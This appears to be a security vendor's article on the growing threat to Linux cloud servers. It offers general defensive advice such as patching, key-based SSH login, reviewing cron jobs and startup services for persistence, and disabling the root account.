In the antivirus industry, a large emphasis is placed on protecting Windows endpoints. Windows desktop users comprise nearly 87% of the total desktop market share, in comparison to the 2% share held by Linux desktop users. Because of this disparity, and the fact that we rarely see malware targeting Linux end users, some people argue that Linux is the safest and most secure operating system.
When discussing threats to the Linux platform, however, we must consider that Linux accounts for nearly 90% of all cloud servers. Even among Microsoft’s Azure Cloud, Linux is the most popular operating system. The industry’s quick migration to the cloud, coupled with a lack of awareness surrounding Linux threats, has contributed to 1) low detection rates reported by the majority of security vendors, and 2) the increase of attackers’ appetite to target Linux systems.
Organizations can implement the following security best practices to mitigate cyber threats targeting Linux systems:
- Keep your systems patched and updated across all Linux servers and devices.
- Implement a runtime protection product and/or an application control (whitelisting) solution. For better results and easier configuration, apply a Genetic Malware Analysis approach to detect malicious code to reduce the number of false positives you usually encounter from such runtime protection solutions.
- Secure SSH login with a key. For remote control standpoint with SSH login, remove the option to log in with credentials. Otherwise, you could be the victim of a brute force attack. It’s much safer to log in via an SSH key.
- Perform a routine review of important system files. It’s important to remember that once installed on a server or device, malware will likely attempt to achieve persistence. In Linux servers especially, it’s critical to look at the different suspicious cron jobs or systemV, systemd initialization scripts and services.
- Disable root accounts. The root account has access to all files and commands on a Linux system, with full read, write, and execute permissions. Errors by the root user can have critical implications on the normal operation of a system. This article from TecMint explains four ways to disable the root account in Linux.
As defenders, we lack research and critical IOCs that can help us to better understand, detect, and respond to Linux threats more consistently, and on a greater scale. Attackers are beginning to target the cloud more often, again considering the majority of cloud servers are based on the Linux operating system. We need to start paying more attention to this threat landscape if we will level the uneven playing field between attackers and defenders.